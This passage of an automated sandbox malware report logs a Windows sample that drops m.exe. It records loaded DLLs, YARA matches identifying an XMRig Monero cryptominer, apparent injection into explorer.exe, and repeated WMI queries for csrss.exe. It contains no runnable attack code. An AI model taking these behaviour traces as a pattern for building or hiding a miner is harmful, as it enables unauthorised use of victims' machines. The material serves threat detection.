                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c8830120.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c8830120.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c882c840.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 16.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.m.exe.7ff7c87f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000010.00000002.2634148822.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: m.exe PID: 2724, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: classification engineClassification label: mal100.evad.mine.winEXE@21/21@1/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeFile created: C:\Program Files\MINAJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5528:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3304:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5060:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05m4eghi.rkd.ps1Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
